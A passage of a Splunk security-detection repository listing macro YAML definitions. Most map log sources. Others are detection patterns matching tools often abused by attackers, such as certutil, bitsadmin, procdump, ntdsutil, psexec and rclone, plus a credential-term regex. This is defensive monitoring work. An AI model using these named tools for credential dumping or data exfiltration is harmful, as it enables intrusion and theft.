3 | Adjust the list to match the methods in use in your Splunk Environment. 4 | name: gws_login_mfa_methods 5 | -------------------------------------------------------------------------------- /macros/gws_reports_admin.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=gws:reports:admin 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: gws_reports_admin 5 | -------------------------------------------------------------------------------- /macros/gws_reports_login.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=gws:reports:login 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: gws_reports_login 5 | -------------------------------------------------------------------------------- /macros/iis_get_webglobalmodule.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype="Pwsh:InstalledIISModules" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: iis_get_webglobalmodule -------------------------------------------------------------------------------- /macros/iis_operational_logs.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype="IIS:Configuration:Operational" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 
4 | name: iis_operational_logs -------------------------------------------------------------------------------- /macros/important_audit_policy_subcategory_guids.yml: -------------------------------------------------------------------------------- 1 | definition: (SubcategoryGuid IN ("{0CCE922B-69AE-11D9-BED3-505054503030}", "{0CCE9215-69AE-11D9-BED3-505054503030}", "{0CCE922F-69AE-11D9-BED3-505054503030}")) 2 | description: This macro is a placeholder that contains a list of important audit policy subcategories. By default it only monitors the "Audit Audit Policy Change", "Audit Logon" and "Audit Process Creation" subcategories. Customers should modify this macro and add the GUIDs important to them. 3 | name: important_audit_policy_subcategory_guids 4 | -------------------------------------------------------------------------------- /macros/is_net_windows_file_macro.yml: -------------------------------------------------------------------------------- 1 | definition: lookup update=true is_net_windows_file filename as process_name OUTPUT netFile | lookup update=true is_net_windows_file originalFileName as original_file_name OUTPUT netFile | search netFile=true 2 | description: This macro limits the output to process names that are .NET binaries on Windows Server 2016 and Windows 11. 3 | name: is_net_windows_file_macro -------------------------------------------------------------------------------- /macros/is_nirsoft_software_macro.yml: -------------------------------------------------------------------------------- 1 | definition: lookup update=true is_nirsoft_software filename as process_name OUTPUT nirsoftFile | search nirsoftFile=true 2 | description: This macro limits the output to process names that match known NirSoft utilities. Remove or filter entries as needed. 
3 | name: is_nirsoft_software_macro -------------------------------------------------------------------------------- /macros/is_windows_system_file_macro.yml: -------------------------------------------------------------------------------- 1 | definition: lookup update=true is_windows_system_file filename as process_name 2 | OUTPUT systemFile | search systemFile=true 3 | description: This macro limits the output to process names that are in the Windows 4 | System directory 5 | name: is_windows_system_file_macro 6 | 7 | -------------------------------------------------------------------------------- /macros/ivanti_vtm_audit.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=ivanti_vtm_audit 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: ivanti_vtm_audit 5 | -------------------------------------------------------------------------------- /macros/kube_allowed_images.yml: -------------------------------------------------------------------------------- 1 | definition: objectRef.name IN (*splunk*, *falco*) 2 | description: Define your images which are allowed to connect to your kubernetes cluster. 3 | name: kube_allowed_images 4 | -------------------------------------------------------------------------------- /macros/kube_allowed_locations.yml: -------------------------------------------------------------------------------- 1 | definition: Country="United States" 2 | description: Define your locations which are allowed to connect to your kubernetes cluster. 
3 | name: kube_allowed_locations 4 | -------------------------------------------------------------------------------- /macros/kube_allowed_user_agents.yml: -------------------------------------------------------------------------------- 1 | definition: userAgent=Helm/3.13.2 2 | description: Define your user agents which are allowed to connect to your kubernetes cluster. 3 | name: kube_allowed_user_agents 4 | -------------------------------------------------------------------------------- /macros/kube_allowed_user_groups.yml: -------------------------------------------------------------------------------- 1 | definition: user.groups{} IN (admin) 2 | description: Define your user groups which are allowed to connect to your kubernetes cluster. 3 | name: kube_allowed_user_groups 4 | -------------------------------------------------------------------------------- /macros/kube_allowed_user_names.yml: -------------------------------------------------------------------------------- 1 | definition: user.username=admin 2 | description: Define your user names which are allowed to connect to your kubernetes cluster. 3 | name: kube_allowed_user_names 4 | -------------------------------------------------------------------------------- /macros/kube_audit.yml: -------------------------------------------------------------------------------- 1 | definition: source="kubernetes" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype) for Kubernetes audit data. Replace the macro definition with configurations for your Splunk Environment. 3 | name: kube_audit 4 | -------------------------------------------------------------------------------- /macros/kube_container_falco.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype="kube:container:falco" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype) for Kubernetes audit data. 
Replace the macro definition with configurations for your Splunk Environment. 3 | name: kube_container_falco 4 | -------------------------------------------------------------------------------- /macros/kube_objects_events.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=kube:objects:events 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: kube_objects_events 5 | -------------------------------------------------------------------------------- /macros/kubernetes_azure.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=mscs:storage:blob:json 2 | description: customer specific splunk configurations(eg- index, source, sourcetype) for Kubernetes data from Azure. Replace the macro definition with configurations for your Splunk Environment. 3 | name: kubernetes_azure 4 | -------------------------------------------------------------------------------- /macros/kubernetes_container_controller.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=kube:container:controller 2 | description: customer specific splunk configurations(eg- index, source, sourcetype) for Kubernetes data. Replace the macro definition with configurations for your Splunk Environment. 3 | name: kubernetes_container_controller 4 | -------------------------------------------------------------------------------- /macros/kubernetes_metrics.yml: -------------------------------------------------------------------------------- 1 | definition: index=kubernetes_metrics 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 
4 | name: kubernetes_metrics 5 | -------------------------------------------------------------------------------- /macros/linux_auditd.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype="auditd" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: linux_auditd -------------------------------------------------------------------------------- /macros/linux_auditd_normalized_execve_process.yml: -------------------------------------------------------------------------------- 1 | definition: 'type=EXECVE | eval relevant_fields=if(type="EXECVE", "", relevant_fields) | foreach a* [eval relevant_fields=if(type="EXECVE", mvappend(relevant_fields, ''<>''), relevant_fields)] | eval process_exec=if(type="EXECVE", mvjoin(relevant_fields, " "), process_exec) | eval process_exec=if(type="EXECVE", trim(process_exec), process_exec)' 2 | description: customer specific splunk configurations to normalized auditd PROCTITLE type to recover process commandline. 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: linux_auditd_normalized_execve_process -------------------------------------------------------------------------------- /macros/linux_hosts.yml: -------------------------------------------------------------------------------- 1 | definition: index=unix 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 
4 | name: linux_hosts -------------------------------------------------------------------------------- /macros/linux_shells.yml: -------------------------------------------------------------------------------- 1 | definition: (Processes.process_name IN ("sh", "ksh", "zsh", "bash", "dash", "rbash", "fish", "csh", "tcsh", "ion", "eshell")) 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: linux_shells 5 | -------------------------------------------------------------------------------- /macros/moveit_sftp_logs.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype="sftp_server_logs" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: moveit_sftp_logs -------------------------------------------------------------------------------- /macros/ms365_defender_incident_alerts.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=ms365:defender:incident:alerts 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: ms365_defender_incident_alerts 5 | -------------------------------------------------------------------------------- /macros/ms_defender.yml: -------------------------------------------------------------------------------- 1 | definition: (source="WinEventLog:Microsoft-Windows-Windows Defender/Operational" OR source="XmlWinEventLog:Microsoft-Windows-Windows Defender/Operational") 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 
4 | name: ms_defender 5 | -------------------------------------------------------------------------------- /macros/ms_defender_atp_alerts.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=ms:defender:atp:alerts 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: ms_defender_atp_alerts -------------------------------------------------------------------------------- /macros/msexchange_management.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=MSExchange:management 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: msexchange_management -------------------------------------------------------------------------------- /macros/netbackup.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype="netbackup_logs" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 
4 | name: netbackup 5 | -------------------------------------------------------------------------------- /macros/network_acl_events.yml: -------------------------------------------------------------------------------- 1 | definition: (eventName = CreateNetworkAcl OR eventName = CreateNetworkAclEntry OR 2 | eventName = DeleteNetworkAcl OR eventName = DeleteNetworkAclEntry OR eventName = 3 | ReplaceNetworkAclEntry OR eventName = ReplaceNetworkAclAssociation) 4 | description: This is a list of AWS event names that are associated with Network ACLs 5 | name: network_acl_events 6 | -------------------------------------------------------------------------------- /macros/nginx_access_logs.yml: -------------------------------------------------------------------------------- 1 | definition: (sourcetype="nginx:plus:kv" OR sourcetype="nginx:plus:access") 2 | description: This is the base macro for Nginx sourcetypes 3 | name: nginx_access_logs 4 | -------------------------------------------------------------------------------- /macros/normalized_service_binary_field.yml: -------------------------------------------------------------------------------- 1 | definition: 'EventCode=7036 | spath input=EventData_Xml path="Binary" output=binary_data | eval trimmed_hexbytes = mvjoin(split(trim(binary_data, "0"), "00"), "") | eval normalized_service_name = if(match(trimmed_hexbytes,"^[0-9A-F]+$"),urldecode(replace(trimmed_hexbytes,"([0-9A-F]{2})","%\1")),trimmed_hexbytes)' 2 | description: customer specific splunk configurations to normalized Windows Event Log System 7036 to recover actual services execution. 3 | Replace the macro definition with configurations for your Splunk Environment. 
4 | name: normalized_service_binary_field -------------------------------------------------------------------------------- /macros/ntlm_audit.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=XmlWinEventLog:Microsoft-Windows-NTLM/Operational OR source=XmlWinEventLog:Microsoft-Windows-NTLM/Operational 2 | description: Customer specific splunk configurations(eg- index, source, sourcetype). Replace the macro definition with configurations for your Splunk Environment. 3 | name: ntlm_audit -------------------------------------------------------------------------------- /macros/o365_graph.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=o365:graph:api 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: o365_graph 5 | -------------------------------------------------------------------------------- /macros/o365_management_activity.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=o365:management:activity 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: o365_management_activity 5 | -------------------------------------------------------------------------------- /macros/o365_messagetrace.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype IN ("ms:o365:reporting:messagetrace","o365:reporting:messagetrace") 2 | description: Customer specific splunk configurations(eg- index, source, sourcetype). Replace the macro definition with configurations for your Splunk Environmnent. 
3 | name: o365_messagetrace 4 | -------------------------------------------------------------------------------- /macros/o365_suspect_search_terms_regex.yml: -------------------------------------------------------------------------------- 1 | definition: "\"(?i)password|credential|login|passwd|shadow|active directory|account|username|network|computer|access|MFA|bank|deposit|payroll|EFT|Electonic Funds|routing\"" 2 | description: A regex used with match statements preloaded with generic suspicious terms or phrases. Is used to detect malicious actor or insider threat searches, replace/modify these terms to suit your organization. 3 | name: o365_suspect_search_terms_regex 4 | -------------------------------------------------------------------------------- /macros/okta.yml: -------------------------------------------------------------------------------- 1 | definition: eventtype=okta_log OR sourcetype = "OktaIM2:log" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: okta 5 | -------------------------------------------------------------------------------- /macros/oldsummaries_config.yml: -------------------------------------------------------------------------------- 1 | definition: "true" 2 | description: Used inside security_content_summariesonly to adjust the allow_old_summaries configuration 3 | name: oldsummaries_config 4 | -------------------------------------------------------------------------------- /macros/osquery_macro.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=osquery:results 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 
4 | name: osquery_macro -------------------------------------------------------------------------------- /macros/osquery_process.yml: -------------------------------------------------------------------------------- 1 | definition: eventtype="osquery-process" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: osquery_process -------------------------------------------------------------------------------- /macros/papercutng.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype="papercutng" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: papercutng 5 | -------------------------------------------------------------------------------- /macros/pingid.yml: -------------------------------------------------------------------------------- 1 | definition: source=PINGID 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 
4 | name: pingid -------------------------------------------------------------------------------- /macros/potential_password_in_username_false_positive_reduction.yml: -------------------------------------------------------------------------------- 1 | definition: search * 2 | description: Add customer specific known false positives to the map command used in detection - Potential password in username 3 | name: potential_password_in_username_false_positive_reduction -------------------------------------------------------------------------------- /macros/powershell.yml: -------------------------------------------------------------------------------- 1 | definition: (source=WinEventLog:Microsoft-Windows-PowerShell/Operational OR source="XmlWinEventLog:Microsoft-Windows-PowerShell/Operational" OR source=WinEventLog:PowerShellCore/Operational OR source="XmlWinEventLog:PowerShellCore/Operational") 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 
4 | name: powershell 5 | -------------------------------------------------------------------------------- /macros/previously_seen_cloud_api_calls_per_user_role_forget_window.yml: -------------------------------------------------------------------------------- 1 | description: Use this macro to determine how long to keep track of cloud api calls per user role 2 | definition: '"-90d@d"' 3 | name: previously_seen_cloud_api_calls_per_user_role_forget_window 4 | -------------------------------------------------------------------------------- /macros/previously_seen_cloud_compute_creations_by_user_search_window_begin_offset.yml: -------------------------------------------------------------------------------- 1 | description: Use this macro to determine how far into the past the window should be to determine if the user is new or not 2 | definition: '"-70m@m"' 3 | name: previously_seen_cloud_compute_creations_by_user_search_window_begin_offset 4 | -------------------------------------------------------------------------------- /macros/previously_seen_cloud_compute_image_search_window_begin_offset.yml: -------------------------------------------------------------------------------- 1 | description: Use this macro to determine how far into the past the window should be to determine if the image is new or not 2 | definition: '"-70m@m"' 3 | name: previously_seen_cloud_compute_image_search_window_begin_offset 4 | -------------------------------------------------------------------------------- /macros/previously_seen_cloud_compute_images_forget_window.yml: -------------------------------------------------------------------------------- 1 | description: Use this macro to determine how long to keep track of cloud instance images 2 | definition: '"-90d@d"' 3 | name: previously_seen_cloud_compute_images_forget_window 4 | -------------------------------------------------------------------------------- /macros/previously_seen_cloud_compute_instance_type_forget_window.yml: 
-------------------------------------------------------------------------------- 1 | description: Use this macro to determine how long to keep track of cloud instance types 2 | definition: '"-90d@d"' 3 | name: previously_seen_cloud_compute_instance_type_forget_window 4 | -------------------------------------------------------------------------------- /macros/previously_seen_cloud_compute_instance_types_search_window_begin_offset.yml: -------------------------------------------------------------------------------- 1 | description: Use this macro to determine how far into the past the window 2 | should be to determine if the instance type is new or not 3 | definition: '"-70m@m"' 4 | name: previously_seen_cloud_compute_instance_types_search_window_begin_offset 5 | -------------------------------------------------------------------------------- /macros/previously_seen_cloud_instance_modifications_by_user_search_window_begin_offset.yml: -------------------------------------------------------------------------------- 1 | description: Use this macro to determine how far into the past the window should be to determine if the user is new or not 2 | definition: '"-70m@m"' 3 | name: previously_seen_cloud_instance_modifications_by_user_search_window_begin_offset 4 | -------------------------------------------------------------------------------- /macros/previously_seen_cloud_provisioning_activity_forget_window.yml: -------------------------------------------------------------------------------- 1 | description: Use this macro to determine how long to keep track of cloud provisioning locations 2 | definition: '"-90d@d"' 3 | name: previously_seen_cloud_provisioning_activity_forget_window 4 | -------------------------------------------------------------------------------- /macros/previously_seen_cloud_region_forget_window.yml: -------------------------------------------------------------------------------- 1 | description: Use this macro to determine how long to keep track of 
cloud regions 2 | definition: '"-90d@d"' 3 | name: previously_seen_cloud_region_forget_window 4 | -------------------------------------------------------------------------------- /macros/previously_seen_cloud_regions_search_window_begin_offset.yml: -------------------------------------------------------------------------------- 1 | description: Use this macro to determine how far into the past the window should be to determine if the region is new or not 2 | definition: '"-70m@m"' 3 | name: previously_seen_cloud_regions_search_window_begin_offset 4 | -------------------------------------------------------------------------------- /macros/previously_seen_windows_services_forget_window.yml: -------------------------------------------------------------------------------- 1 | description: Use this macro to determine how long to keep track of Windows services 2 | definition: '"-90d@d"' 3 | name: previously_seen_windows_services_forget_window 4 | -------------------------------------------------------------------------------- /macros/previously_seen_windows_services_window.yml: -------------------------------------------------------------------------------- 1 | description: Use this macro to determine how far back you should be checking for new Windows services 2 | definition: '"-70m@m"' 3 | name: previously_seen_windows_services_window 4 | -------------------------------------------------------------------------------- /macros/previously_seen_zoom_child_processes_forget_window.yml: -------------------------------------------------------------------------------- 1 | description: Use this macro to determine how long to keep track of zoom child processes 2 | definition: '"-90d@d"' 3 | name: previously_seen_zoom_child_processes_forget_window 4 | -------------------------------------------------------------------------------- /macros/previously_seen_zoom_child_processes_window.yml: -------------------------------------------------------------------------------- 1 | 
description: Use this macro to determine how far back you should be checking for new zoom child processes 2 | definition: '"-70m@m"' 3 | name: previously_seen_zoom_child_processes_window 4 | -------------------------------------------------------------------------------- /macros/previously_unseen_cloud_provisioning_activity_window.yml: -------------------------------------------------------------------------------- 1 | description: Use this macro to determine how far back you should be checking for new provisioning activities 2 | definition: '"-70m@m"' 3 | name: previously_unseen_cloud_provisioning_activity_window 4 | -------------------------------------------------------------------------------- /macros/printservice.yml: -------------------------------------------------------------------------------- 1 | definition: (source="Wineventlog:microsoft-windows-printservice/operational" OR source="XmlWineventlog:microsoft-windows-printservice/operational" OR source="WinEventLog:Microsoft-Windows-PrintService/Admin" OR source="XmlWinEventLog:Microsoft-Windows-PrintService/Admin") 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 
4 | name: printservice 5 | -------------------------------------------------------------------------------- /macros/process_auditpol.yml: -------------------------------------------------------------------------------- 1 | definition: (Processes.process_name="auditpol.exe" OR Processes.original_file_name="AUDITPOL.EXE") 2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/ 3 | name: process_auditpol 4 | -------------------------------------------------------------------------------- /macros/process_bitsadmin.yml: -------------------------------------------------------------------------------- 1 | definition: (Processes.process_name=bitsadmin.exe OR Processes.original_file_name=bitsadmin.exe) 2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/ 3 | name: process_bitsadmin -------------------------------------------------------------------------------- /macros/process_certutil.yml: -------------------------------------------------------------------------------- 1 | definition: (Processes.process_name=certutil.exe OR Processes.original_file_name=CertUtil.exe) 2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/ 3 | name: process_certutil -------------------------------------------------------------------------------- /macros/process_cmd.yml: -------------------------------------------------------------------------------- 1 | definition: (Processes.process_name=cmd.exe OR Processes.original_file_name=Cmd.Exe) 2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/ 3 | name: process_cmd -------------------------------------------------------------------------------- /macros/process_copy.yml: -------------------------------------------------------------------------------- 1 | definition: 
(Processes.process_name=copy.exe OR Processes.original_file_name=copy.exe OR Processes.process_name=xcopy.exe OR Processes.original_file_name=xcopy.exe) 2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/ 3 | name: process_copy -------------------------------------------------------------------------------- /macros/process_csc.yml: -------------------------------------------------------------------------------- 1 | definition: (Processes.process_name=csc.exe OR Processes.original_file_name=csc.exe) 2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/ 3 | name: process_csc -------------------------------------------------------------------------------- /macros/process_cscript.yml: -------------------------------------------------------------------------------- 1 | definition: (Processes.process_name=cscript.exe OR Processes.original_file_name=cscript.exe) 2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/ 3 | name: process_cscript 4 | -------------------------------------------------------------------------------- /macros/process_curl.yml: -------------------------------------------------------------------------------- 1 | definition: (Processes.process_name=curl.exe OR Processes.original_file_name=Curl.exe) 2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/ 3 | name: process_curl -------------------------------------------------------------------------------- /macros/process_diskshadow.yml: -------------------------------------------------------------------------------- 1 | definition: (Processes.process_name=diskshadow.exe OR Processes.original_file_name=diskshadow.exe) 2 | description: Matches the process with its original file name, data for this macro came from 
https://strontic.github.io/ 3 | name: process_diskshadow -------------------------------------------------------------------------------- /macros/process_dllhost.yml: -------------------------------------------------------------------------------- 1 | definition: (Processes.process_name=dllhost.exe OR Processes.original_file_name=dllhost.exe) 2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/ 3 | name: process_dllhost 4 | -------------------------------------------------------------------------------- /macros/process_dsquery.yml: -------------------------------------------------------------------------------- 1 | definition: (Processes.process_name=dsquery.exe OR Processes.original_file_name=dsquery.exe) 2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/ 3 | name: process_dsquery 4 | -------------------------------------------------------------------------------- /macros/process_dxdiag.yml: -------------------------------------------------------------------------------- 1 | definition: (Processes.process_name=dxdiag.exe OR Processes.original_file_name=dxdiag.exe) 2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/ 3 | name: process_dxdiag -------------------------------------------------------------------------------- /macros/process_esentutl.yml: -------------------------------------------------------------------------------- 1 | definition: (Processes.process_name=esentutl.exe OR Processes.original_file_name=esentutl.exe) 2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/ 3 | name: process_esentutl 4 | -------------------------------------------------------------------------------- /macros/process_fodhelper.yml: 
-------------------------------------------------------------------------------- 1 | definition: (Processes.process_name=fodhelper.exe OR Processes.original_file_name=FodHelper.EXE) 2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/ 3 | name: process_fodhelper 4 | -------------------------------------------------------------------------------- /macros/process_gpupdate.yml: -------------------------------------------------------------------------------- 1 | definition: (Processes.process_name=gpupdate.exe OR Processes.original_file_name=GPUpdate.exe) 2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/ 3 | name: process_gpupdate 4 | -------------------------------------------------------------------------------- /macros/process_hh.yml: -------------------------------------------------------------------------------- 1 | definition: (Processes.process_name=hh.exe OR Processes.original_file_name=HH.EXE) 2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/ 3 | name: process_hh -------------------------------------------------------------------------------- /macros/process_installutil.yml: -------------------------------------------------------------------------------- 1 | definition: (Processes.process_name=installutil.exe OR Processes.original_file_name=InstallUtil.exe) 2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/ 3 | name: process_installutil 4 | -------------------------------------------------------------------------------- /macros/process_microsoftworkflowcompiler.yml: -------------------------------------------------------------------------------- 1 | definition: (Processes.process_name=microsoft.workflow.compiler.exe OR 
Processes.original_file_name=Microsoft.Workflow.Compiler.exe) 2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/ 3 | name: process_microsoftworkflowcompiler 4 | -------------------------------------------------------------------------------- /macros/process_msbuild.yml: -------------------------------------------------------------------------------- 1 | definition: (Processes.process_name=msbuild.exe OR Processes.original_file_name=MSBuild.exe) 2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/ 3 | name: process_msbuild 4 | -------------------------------------------------------------------------------- /macros/process_mshta.yml: -------------------------------------------------------------------------------- 1 | definition: (Processes.process_name=mshta.exe OR Processes.original_file_name=MSHTA.EXE) 2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/ 3 | name: process_mshta -------------------------------------------------------------------------------- /macros/process_msiexec.yml: -------------------------------------------------------------------------------- 1 | definition: (Processes.process_name=msiexec.exe OR Processes.original_file_name=msiexec.exe) 2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/ 3 | name: process_msiexec -------------------------------------------------------------------------------- /macros/process_net.yml: -------------------------------------------------------------------------------- 1 | definition: (Processes.process_name="net1.exe" OR Processes.original_file_name="net1.exe") 2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/ 3 | name: process_net 
--------------------------------------------------------------------------------
/macros/process_netsh.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=netsh.exe OR Processes.original_file_name=netsh.exe)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_netsh

--------------------------------------------------------------------------------
/macros/process_nltest.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=nltest.exe OR Processes.original_file_name=nltestrk.exe)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_nltest

--------------------------------------------------------------------------------
/macros/process_ntdsutil.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=ntdsutil.exe OR Processes.original_file_name=ntdsutil.exe)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_ntdsutil

--------------------------------------------------------------------------------
/macros/process_office_products.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name IN ("EQNEDT32.exe", "excel.exe", "Graph.exe", "msaccess.exe", "mspub.exe", "onenote.exe", "onenoteim.exe", "onenotem.exe", "outlook.exe", "powerpnt.exe", "visio.exe", "winproj.exe", "winword.exe", "wordpad.exe", "wordview.exe") OR Processes.original_file_name IN ("EQNEDT32.EXE", "Excel.exe", "Graph.exe", "MSACCESS.EXE", "MSPUB.EXE", "OneNote.exe", "OneNoteIm.exe", "OneNoteM.exe", "OUTLOOK.EXE", "POWERPNT.EXE", "VISIO.EXE", "WinProj.exe", "WinWord.exe"))
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_office_products

--------------------------------------------------------------------------------
/macros/process_office_products_parent.yml:
--------------------------------------------------------------------------------
definition: (Processes.parent_process_name IN ("EQNEDT32.exe", "excel.exe", "Graph.exe", "msaccess.exe", "mspub.exe", "onenote.exe", "onenoteim.exe", "onenotem.exe", "outlook.exe", "powerpnt.exe", "visio.exe", "winproj.exe", "winword.exe"))
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_office_products_parent

--------------------------------------------------------------------------------
/macros/process_ping.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=ping.exe OR Processes.original_file_name=ping.exe)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_ping

--------------------------------------------------------------------------------
/macros/process_powershell.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=pwsh.exe OR Processes.process_name=powershell.exe OR Processes.process_name=powershell_ise.exe OR Processes.original_file_name=pwsh.dll OR Processes.original_file_name=PowerShell.EXE OR Processes.original_file_name=powershell_ise.EXE)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_powershell

--------------------------------------------------------------------------------
/macros/process_procdump.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=procdump.exe OR Processes.process_name=procdump64.exe OR Processes.original_file_name=procdump)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_procdump

--------------------------------------------------------------------------------
/macros/process_psexec.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=psexec.exe OR Processes.process_name=psexec64.exe OR Processes.original_file_name=psexec.c)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_psexec

--------------------------------------------------------------------------------
/macros/process_rclone.yml:
--------------------------------------------------------------------------------
definition: (Processes.original_file_name=rclone.exe OR Processes.process_name=rclone.exe)
description: Matches the process with its original file name.
name: process_rclone

--------------------------------------------------------------------------------
/macros/process_reg.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=reg.exe OR Processes.original_file_name=reg.exe)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_reg

--------------------------------------------------------------------------------
/macros/process_regasm.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=regasm.exe OR Processes.original_file_name=RegAsm.exe)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_regasm

--------------------------------------------------------------------------------
/macros/process_regedit.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=regedit.exe OR Processes.original_file_name=REGEDIT.exe)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_regedit

--------------------------------------------------------------------------------
/macros/process_regsvcs.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=regsvcs.exe OR Processes.original_file_name=RegSvcs.exe)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_regsvcs

--------------------------------------------------------------------------------
/macros/process_regsvr32.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=regsvr32.exe OR Processes.original_file_name=REGSVR32.EXE)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_regsvr32

--------------------------------------------------------------------------------
/macros/process_route.yml:
--------------------------------------------------------------------------------
definition: (Processes.process_name=route.exe OR Processes.original_file_name=route.exe)
description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
name: process_route

--------------------------------------------------------------------------------
